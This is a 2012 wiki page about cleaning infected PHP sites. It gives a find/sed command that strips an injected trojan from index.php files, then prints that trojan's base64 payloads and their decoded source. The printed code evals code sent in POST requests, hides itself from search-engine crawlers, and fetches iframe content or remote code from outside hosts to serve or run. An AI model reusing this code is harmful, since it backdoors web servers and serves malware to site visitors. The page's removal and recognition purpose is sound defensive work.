Code/PHP/TrojanRemoval

From LunaSys
Revision as of 13:55, 24 June 2012 by Eadam (talk | contribs) (Created page with "== Remove trojan in *index.php files == The following command: <pre> find . -name '*index.php' -exec sed -i "s|<?php\ /\*68066\*/\ error_reporting(0);\ @ini_set('error_log',...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Remove trojan in *index.php files

The following command: 

find . -name '*index.php' -exec sed -i "s|<?php\ /\*68066\*/\ error_reporting(0);\ @ini_set('error_log',NULL);\ @ini_set('log_errors',0);\ @ini_set('display_errors','Off');\ @eval(\ base64_decode('.*'));/\*68066\*/\ ?>||" {} \;

Remove the following badware: 

<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhMz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkpCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoKSsxNzI4MDApOwokaWQ9IjlvOGFhODhsOGVqaTEycmpmNWtva2VteGZ5amx6MXQiOwokdXJsPSJodHRwOi8vaWZyYW1lc2hvcC5uZXQvc3RpLnBocD9pZD0iLiRpZDsKJGlmcmFtZT1AZmlsZV9nZXRfY29udGVudHMgKCR1cmwpOwppZiAoJGlmcmFtZSkgZWNobygkaWZyYW1lKTsgCn0K'));/*68066*/ ?>

php code: 

error_reporting(0);
set_time_limit(0);
if (isset($_POST['cookies_i'])) {eval(base64_decode($_POST['cookies_i']));}
$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0) or (isset($_SERVER["HTTP_COOKIE"])))
{}
else
{
  @setcookie($z37,md5("stats"),time()+172800);
  $id="9o8aa88l8eji12rjf5kokemxfyjlz1t";
  $url="http://iframeshop.net/sti.php?id=".$id;
  $iframe=@file_get_contents ($url);
  if ($iframe) echo($iframe); 
}


With different variants:

  • ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4IiwgIlgxMSIpOwppZigocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJHUzNykgLiAiL2kiLCAkdWEzKSkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSkgPT0wKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkgIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgKQp7fQplbHNlCnsKQHNldGNvb2tpZSgkejM3LG1kNSgic3RhdHMiKSx0aW1lKCkrMTcyODAwKTsKJHVybCA9ICJodHRwOi8vNDA0MGVudC5jb20vc2Vzc2lvbi5waHA/aWQiOwokaWZyYW1lPUBldmFsKGZpbGVfZ2V0X2NvbnRlbnRzICgkdXJsKSk7CmlmICgkaWZyYW1lKSBlY2hvKCRpZnJhbWUpOyAKfQoK

php code: 

error_reporting(0);
set_time_limit(0);
$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_REFERER"]) ==0)  or (isset($_SERVER["HTTP_COOKIE"]))  or (isset($_SERVER["HTTP_USER_AGENT"]) ==0) )
{}
else
{
  @setcookie($z37,md5("stats"),time()+172800);
  $url = "http://4040ent.com/session.php?id";
  $iframe=@eval(file_get_contents ($url));
  if ($iframe) echo($iframe); 
}
  • ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4Iik7CmlmKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkdTM3KSAuICIvaSIsICR1YTMpKSBvciAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfQ09PS0lFIl0pKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkgPT0wKSApCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoKSsxNzI4MDApOwokdXJsID0gImh0dHA6Ly80MDQwZW50LmNvbS9zZXNzaW9uLnBocD9pZCI7CiRpZnJhbWU9QGV2YWwoZmlsZV9nZXRfY29udGVudHMgKCR1cmwpKTsKaWYgKCRpZnJhbWUpIGVjaG8oJGlmcmFtZSk7IAp9

php code: 

error_reporting(0);
set_time_limit(0);
$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_COOKIE"]))  or (isset($_SERVER["HTTP_USER_AGENT"]) ==0) )
{}
else
{
  @setcookie($z37,md5("stats"),time()+172800);
  $url = "http://4040ent.com/session.php?id";
  $iframe=@eval(file_get_contents ($url));
  if ($iframe) echo($iframe); 
}
Retrieved from "http://wiki.lunasys.fr/mediawiki/index.php?title=Code/PHP/TrojanRemoval&oldid=174"